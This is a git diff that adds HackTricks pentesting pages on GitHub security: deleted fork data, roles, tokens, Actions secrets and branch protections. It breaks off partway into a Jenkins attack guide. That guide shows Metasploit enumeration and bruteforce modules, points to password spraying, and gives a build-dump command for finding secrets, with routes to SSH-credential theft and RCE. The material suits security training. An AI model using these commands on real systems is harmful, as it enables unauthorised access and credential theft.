+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
new file mode 100644
index 0000000000..6735c7d657
--- /dev/null
+++ b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-artifact-poisoning.md
@@ -0,0 +1,2 @@
+# Gh Actions - Artifact Poisoning
+
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
new file mode 100644
index 0000000000..ad5539e7c1
--- /dev/null
+++ b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-cache-poisoning.md
@@ -0,0 +1,2 @@
+# GH Actions - Cache Poisoning
+
diff --git a/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
new file mode 100644
index 0000000000..89d6cff73c
--- /dev/null
+++ b/pentesting-ci-cd/github-security/abusing-github-actions/gh-actions-context-script-injections.md
@@ -0,0 +1,2 @@
+# Gh Actions - Context Script Injections
+
diff --git a/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md b/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
new file mode 100644
index 0000000000..3923868662
--- /dev/null
+++ b/pentesting-ci-cd/github-security/accessible-deleted-data-in-github.md
@@ -0,0 +1,85 @@
+# Accessible Deleted Data in Github
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+This ways to access data from Github that was supposedly deleted was [**reported in this blog post**](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github).
+
+## Accessing Deleted Fork Data
+
+1. You fork a public repository
+2. You commit code to your fork
+3. You delete your fork
+
+{% hint style="danger" %}
+The data commited in the deleted fork is still accessible.
+{% endhint %}
+
+## Accessing Deleted Repo Data
+
+1. You have a public repo on GitHub.
+2. A user forks your repo.
+3. You commit data after they fork it (and they never sync their fork with your updates).
+4. You delete the entire repo.
+
+{% hint style="danger" %}
+Even if you deleted your repo, all the changes made to it are still accessible through the forks.
+{% endhint %}
+
+## Accessing Private Repo Data
+
+1. You create a private repo that will eventually be made public.
+2. You create a private, internal version of that repo (via forking) and commit additional code for features that you’re not going to make public.
+3. You make your “upstream” repository public and keep your fork private.
+
+{% hint style="danger" %}
+It's possible to access al the data pushed to the internal fork in the time between the internal fork was created and the public version was made public.
+{% endhint %}
+
+## How to discover commits from deleted/hidden forks
+
+The same blog post propose 2 options:
+
+### Directly accessing the commit
+
+If the commit ID (sha-1) value is known it's possible to access it in `https://github.com/<user/org>/<repo>/commit/<commit_hash>`
+
+### Brute-forcing short SHA-1 values
+
+It's the same to access both of these:
+
+* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14](https://github.com/HackTricks-wiki/hacktricks/commit/8cf94635c266ca5618a9f4da65ea92c04bee9a14)
+* [https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463](https://github.com/HackTricks-wiki/hacktricks/commit/8cf9463)
+
+And the latest one use a short sha-1 that is bruteforceable.
+
+## References
+
+* [https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github](https://trufflesecurity.com/blog/anyone-can-access-deleted-and-private-repo-data-github)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/github-security/basic-github-information.md b/pentesting-ci-cd/github-security/basic-github-information.md
new file mode 100644
index 0000000000..a4cabaef37
--- /dev/null
+++ b/pentesting-ci-cd/github-security/basic-github-information.md
@@ -0,0 +1,286 @@
+# Basic Github Information
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Structure
+
+The basic github environment structure of a big **company** is to own an **enterprise** which owns **several organizations** and each of them may contain **several repositories** and **several teams.**. Smaller companies may just **own one organization and no enterprises**.
+
+From a user point of view a **user** can be a **member** of **different enterprises and organizations**. Within them the user may have **different enterprise, organization and repository roles**.
+
+Moreover, a user may be **part of different teams** with different enterprise, organization or repository roles.
+
+And finally **repositories may have special protection mechanisms**.
+
+## Privileges
+
+### Enterprise Roles
+
+* **Enterprise owner**: People with this role can **manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations**. However, they **cannot access organization settings or content** unless they are made an organization owner or given direct access to an organization-owned repository
+* **Enterprise members**: Members of organizations owned by your enterprise are also **automatically members of the enterprise**.
+
+### Organization Roles
+
+In an organisation users can have different roles:
+
+* **Organization owners**: Organization owners have **complete administrative access to your organization**. This role should be limited, but to no less than two people, in your organization.
+* **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**.
+* **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information.
+* **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization.
+  * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization.
+* **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions.
+* **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization.
+
+You can **compare the permissions** of these roles in this table: [https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles](https://docs.github.com/en/organizations/managing-peoples-access-to-your-organization-with-roles/roles-in-an-organization#permissions-for-organization-roles)
+
+### Members Privileges
+
+In _https://github.com/organizations/\<org\_name>/settings/member\_privileges_ you can see the **permissions users will have just for being part of the organisation**.
+
+The settings here configured will indicate the following permissions of members of the organisation:
+
+* Be admin, writer, reader or no permission over all the organisation repos.
+* If members can create private, internal or public repositories.
+* If forking of repositories is possible
+* If it's possible to invite outside collaborators
+* If public or private sites can be published
+* The permissions admins has over the repositories
+* If members can create new teams
+
+### Repository Roles
+
+By default repository roles are created:
+
+* **Read**: Recommended for **non-code contributors** who want to view or discuss your project
+* **Triage**: Recommended for **contributors who need to proactively manage issues and pull requests** without write access
+* **Write**: Recommended for contributors who **actively push to your project**
+* **Maintain**: Recommended for **project managers who need to manage the repository** without access to sensitive or destructive actions
+* **Admin**: Recommended for people who need **full access to the project**, including sensitive and destructive actions like managing security or deleting a repository
+
+You can **compare the permissions** of each role in this table [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization#permissions-for-each-role)
+
+You can also **create your own roles** in _https://github.com/organizations/\<org\_name>/settings/roles_
+
+### Teams
+
+You can **list the teams created in an organization** in _https://github.com/orgs/\<org\_name>/teams_. Note that to see the teams which are children of other teams you need to access each parent team.
+
+### Users
+
+The users of an organization can be **listed** in _https://github.com/orgs/\<org\_name>/people._
+
+In the information of each user you can see the **teams the user is member of**, and the **repos the user has access to**.
+
+## Github Authentication
+
+Github offers different ways to authenticate to your account and perform actions on your behalf.
+
+### Web Access
+
+Accessing **github.com** you can login using your **username and password** (and a **2FA potentially**).
+
+### **SSH Keys**
+
+You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [https://github.com/settings/keys](https://github.com/settings/keys)
+
+#### **GPG Keys**
+
+You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. Learn more about [vigilant mode here](https://docs.github.com/en/authentication/managing-commit-signature-verification/displaying-verification-statuses-for-all-of-your-commits#about-vigilant-mode).
+
+### **Personal Access Tokens**
+
+You can generate personal access token to **give an application access to your account**. When creating a personal access token the **user** needs to **specify** the **permissions** to **token** will have. [https://github.com/settings/tokens](https://github.com/settings/tokens)
+
+### Oauth Applications
+
+Oauth applications may ask you for permissions **to access part of your github information or to impersonate you** to perform some actions. A common example of this functionality is the **login with github button** you might find in some platforms.
+
+* You can **create** your own **Oauth applications** in [https://github.com/settings/developers](https://github.com/settings/developers)
+* You can see all the **Oauth applications that has access to your account** in [https://github.com/settings/applications](https://github.com/settings/applications)
+* You can see the **scopes that Oauth Apps can ask for** in [https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)
+* You can see third party access of applications in an **organization** in _https://github.com/organizations/\<org\_name>/settings/oauth\_application\_policy_
+
+Some **security recommendations**:
+
+* An **OAuth App** should always **act as the authenticated GitHub user across all of GitHub** (for example, when providing user notifications) and with access only to the specified scopes..
+* An OAuth App can be used as an identity provider by enabling a "Login with GitHub" for the authenticated user.
+* **Don't** build an **OAuth App** if you want your application to act on a **single repository**. With the `repo` OAuth scope, OAuth Apps can **act on \_all**\_\*\* of the authenticated user's repositorie\*\*s.
+* **Don't** build an OAuth App to act as an application for your **team or company**. OAuth Apps authenticate as a **single user**, so if one person creates an OAuth App for a company to use, and then they leave the company, no one else will have access to it.
+* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-oauth-apps).
+
+### Github Applications
+
+Github applications can ask for permissions to **access your github information or impersonate you** to perform specific actions over specific resources. In Github Apps you need to specify the repositories the app will have access to.
+
+* To install a GitHub App, you must be an **organisation owner or have admin permissions** in a repository.
+* The GitHub App should **connect to a personal account or an organisation**.
+* You can create your own Github application in [https://github.com/settings/apps](https://github.com/settings/apps)
+* You can see all the **Github applications that has access to your account** in [https://github.com/settings/apps/authorizations](https://github.com/settings/apps/authorizations)
+* These are the **API Endpoints for Github Applications** [https://docs.github.com/en/rest/overview/endpoints-available-for-github-app](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps). Depending on the permissions of the App it will be able to access some of them
+* You can see installed apps in an **organization** in _https://github.com/organizations/\<org\_name>/settings/installations_
+
+Some security recommendations:
+
+* A GitHub App should **take actions independent of a user** (unless the app is using a [user-to-server](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps#user-to-server-requests) token). To keep user-to-server access tokens more secure, you can use access tokens that will expire after 8 hours, and a refresh token that can be exchanged for a new access token. For more information, see "[Refreshing user-to-server access tokens](https://docs.github.com/en/apps/building-github-apps/refreshing-user-to-server-access-tokens)."
+* Make sure the GitHub App integrates with **specific repositories**.
+* The GitHub App should **connect to a personal account or an organisation**.
+* Don't expect the GitHub App to know and do everything a user can.
+* **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things.
+* Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do.
+* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)."
+* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps).
+
+### Github Actions
+
+This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information.
+
+## Git Actions
+
+Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets).
+
+### Configuration
+
+In _https://github.com/organizations/\<org\_name>/settings/actions_ it's possible to check the **configuration of the github actions** for the organization.
+
+It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions.
+
+It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the GITHUB\_TOKEN** of a Github Action when it's run.
+
+### Git Secrets
+
+Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**.
+
+These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like:
+
+```yaml
+steps:
+  - name: Hello world action
+    with: # Set the secret as an input
+      super_secret: ${{ secrets.SuperSecret }}
+    env: # Or as an environment variable
+      super_secret: ${{ secrets.SuperSecret }}
+```
+
+#### Example using Bash <a href="#example-using-bash" id="example-using-bash"></a>
+
+```yaml
+steps:
+  - shell: bash
+    env:
+      SUPER_SECRET: ${{ secrets.SuperSecret }}
+    run: |
+      example-command "$SUPER_SECRET"
+```
+
+{% hint style="warning" %}
+Secrets **can only be accessed from the Github Actions** that have them declared.
+
+Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**.
+{% endhint %}
+
+Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action).
+
+### Git Environments
+
+Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like:
+
+```yaml
+jobs:
+  deployment:
+    runs-on: ubuntu-latest
+    environment: env_name
+```
+
+You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it.\
+It can also set a **number of required reviews** before **executing** an **action** using an **environment** or **wait** some **time** before allowing deployments to proceed.
+
+### Git Action Runner
+
+A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user.
+
+Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**.
+
+You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\<org\_name>/settings/actions/runners_
+
+The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml.
+
+It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs.
+
+If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with.
+
+### Git Action Compromise
+
+If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed.
+
+{% hint style="danger" %}
+A **malicious Github Action** run could be **abused** by the attacker to:
+
+* **Steal all the secrets** the Action has access to
+* **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service)
+* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**.
+{% endhint %}
+
+## Branch Protections
+
+Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
+
+The **branch protections of a repository** can be found in _https://github.com/\<orgname>/\<reponame>/settings/branches_
+
+{% hint style="info" %}
+It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
+{% endhint %}
+
+Different protections can be applied to a branch (like to master):
+
+* You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place:
+  * **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly.
+  * **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it.
+  * **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it)
+  * **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews.
+  * **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions.
+* **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret).
+* **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged.
+* **Require signed commits**. The commits need to be signed.
+* **Require linear history.** Prevent merge commits from being pushed to matching branches.
+* **Include administrators**. If this isn't set, admins can bypass the restrictions.
+* **Restrict who can push to matching branches**. Restrict who can send a PR.
+
+{% hint style="info" %}
+As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
+{% endhint %}
+
+## References
+
+* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization)
+* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)
+* [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github)
+* [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards)
+* [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-ci-cd/jenkins-security/README.md b/pentesting-ci-cd/jenkins-security/README.md
new file mode 100644
index 0000000000..e15154aabb
--- /dev/null
+++ b/pentesting-ci-cd/jenkins-security/README.md
@@ -0,0 +1,439 @@
+# Jenkins Security
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Jenkins is a tool that offers a straightforward method for establishing a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **programming languages** and source code repositories using pipelines. Furthermore, it automates various routine development tasks. While Jenkins doesn't eliminate the **need to create scripts for individual steps**, it does provide a faster and more robust way to integrate the entire sequence of build, test, and deployment tools than one can easily construct manually.
+
+{% content-ref url="basic-jenkins-information.md" %}
+[basic-jenkins-information.md](basic-jenkins-information.md)
+{% endcontent-ref %}
+
+## Unauthenticated Enumeration
+
+In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use:
+
+```
+msf> use auxiliary/scanner/http/jenkins_enum
+```
+
+Check if you can execute commands without needing authentication:
+
+```
+msf> use auxiliary/scanner/http/jenkins_command
+```
+
+Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**.
+
+You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_
+
+![](<../../.gitbook/assets/image (146).png>)
+
+### Known Vulnerabilities
+
+{% embed url="https://github.com/gquere/pwn_jenkins" %}
+
+## Login
+
+In the basic information you can check **all the ways to login inside Jenkins**:
+
+{% content-ref url="basic-jenkins-information.md" %}
+[basic-jenkins-information.md](basic-jenkins-information.md)
+{% endcontent-ref %}
+
+### Register
+
+You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**
+
+### **SSO Login**
+
+Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/).
+
+### Bruteforce
+
+**Jenkins** lacks **password policy** and **username brute-force mitigation**. It's essential to **brute-force** users since **weak passwords** or **usernames as passwords** may be in use, even **reversed usernames as passwords**.
+
+```
+msf> use auxiliary/scanner/http/jenkins_login
+```
+
+### Password spraying
+
+Use [this python script](https://github.com/gquere/pwn_jenkins/blob/master/password_spraying/jenkins_password_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray).
+
+### IP Whitelisting Bypass
+
+Many organizations combine **SaaS-based source control management (SCM) systems** such as GitHub or GitLab with an **internal, self-hosted CI** solution like Jenkins or TeamCity. This setup allows CI systems to **receive webhook events from SaaS source control vendors**, primarily for triggering pipeline jobs.
+
+To achieve this, organizations **whitelist** the **IP ranges** of the **SCM platforms**, permitting them to access the **internal CI system** via **webhooks**. However, it's important to note that **anyone** can create an **account** on GitHub or GitLab and configure it to **trigger a webhook**, potentially sending requests to the **internal CI system**.
+
+Check: [https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/](https://www.paloaltonetworks.com/blog/prisma-cloud/repository-webhook-abuse-access-ci-cd-systems-at-scale/)
+
+## Internal Jenkins Abuses
+
+In these scenarios we are going to suppose you have a valid account to access Jenkins.
+
+{% hint style="warning" %}
+Depending on the **Authorization** mechanism configured in Jenkins and the permission of the compromised user you **might be able or not to perform the following attacks.**
+{% endhint %}
+
+For more information check the basic information:
+
+{% content-ref url="basic-jenkins-information.md" %}
+[basic-jenkins-information.md](basic-jenkins-information.md)
+{% endcontent-ref %}
+
+### Listing users
+
+If you have accessed Jenkins you can list other registered users in [http://127.0.0.1:8080/asynchPeople/](http://127.0.0.1:8080/asynchPeople/)
+
+### Dumping builds to find cleartext secrets
+
+Use [this script](https://github.com/gquere/pwn_jenkins/blob/master/dump_builds/jenkins_dump_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets.
+
+```bash
+python3 jenkins_dump_builds.py -u alice -p alice http://127.0.0.1:8080/ -o build_dumps
+cd build_dumps
+gitleaks detect --no-git -v
+```
+
+### **Stealing SSH Credentials**
+
+If the compromised user has **enough privileges to create/modify a new Jenkins node** and SSH credentials are already stored to access other nodes, he could **steal those credentials** by creating/modifying a node and **setting a host that will record the credentials** without verifying the host key:
+
+![](<../../.gitbook/assets/image (218).png>)
+
+You will usually find Jenkins ssh credentials in a **global provider** (`/credentials/`), so you can also dump them as you would dump any other secret. More information in the [**Dumping secrets section**](./#dumping-secrets).
+
+### **RCE in Jenkins**
+
+Getting a **shell in the Jenkins server** gives the attacker the opportunity to leak all the **secrets** and **env variables** and to **exploit other machines** located in the same network or even **gather cloud credentials**.
+
+By default, Jenkins will **run as SYSTEM**. So, compromising it will give the attacker **SYSTEM privileges**.
+
+### **RCE Creating/Modifying a project**
+
+Creating/Modifying a project is a way to obtain RCE over the Jenkins server:
+
+{% content-ref url="jenkins-rce-creating-modifying-project.md" %}
+[jenkins-rce-creating-modifying-project.md](jenkins-rce-creating-modifying-project.md)
+{% endcontent-ref %}
+
+### **RCE Execute Groovy script**
+
+You can also obtain RCE executing a Groovy script, which might my stealthier than creating a new project:
+
+{% content-ref url="jenkins-rce-with-groovy-script.md" %}
+[jenkins-rce-with-groovy-script.md](jenkins-rce-with-groovy-script.md)
+{% endcontent-ref %}
+
+### RCE Creating/Modifying Pipeline
+
+You can also get **RCE by creating/modifying a pipeline**:
+
+{% content-ref url="jenkins-rce-creating-modifying-pipeline.md" %}
+[jenkins-rce-creating-modifying-pipeline.md](jenkins-rce-creating-modifying-pipeline.md)
+{% endcontent-ref %}
+
+## Pipeline Exploitation
+
+To exploit pipelines you still need to have access to Jenkins.
+
+### Build Pipelines
+
+**Pipelines** can also be used as **build mechanism in projects**, in that case it can be configured a **file inside the repository** that will contains the pipeline syntax. By default `/Jenkinsfile` is used:
+
+![](<../../.gitbook/assets/image (127).png>)
+
+It's also possible to **store pipeline configuration files in other places** (in other repositories for example) with the goal of **separating** the repository **access** and the pipeline access.
+
+If an attacker have **write access over that file** he will be able to **modify** it and **potentially trigger** the pipeline without even having access to Jenkins.\
+It's possible that the attacker will need to **bypass some branch protections** (depending on the platform and the user privileges they could be bypassed or not).
+
+The most common triggers to execute a custom pipeline are:
+
+* **Pull request** to the main branch (or potentially to other branches)
+* **Push to the main branch** (or potentially to other branches)
+* **Update the main branch** and wait until it's executed somehow
+
+{% hint style="info" %}
+If you are an **external user** you shouldn't expect to create a **PR to the main branch** of the repo of **other user/organization** and **trigger the pipeline**... but if it's **bad configured** you could fully **compromise companies just by exploiting this**.
+{% endhint %}
+
+### Pipeline RCE
+
+In the previous RCE section it was already indicated a technique to [**get RCE modifying a pipeline**](./#rce-creating-modifying-pipeline).
+
+### Checking Env variables
+
+It's possible to declare **clear text env variables** for the whole pipeline or for specific stages. This env variables **shouldn't contain sensitive info**, but and attacker could always **check all the pipeline** configurations/Jenkinsfiles:
+
+```bash
+pipeline {
+    agent {label 'built-in'}
+    environment {
+        GENERIC_ENV_VAR = "Test pipeline ENV variables."
+    }
+
+    stages {
+        stage("Build") {
+                environment {
+                    STAGE_ENV_VAR = "Test stage ENV variables."
+                }
+                steps {
+```
+
+### Dumping secrets
+
+For information about how are secrets usually treated by Jenkins check out the basic information:
+
+{% content-ref url="basic-jenkins-information.md" %}
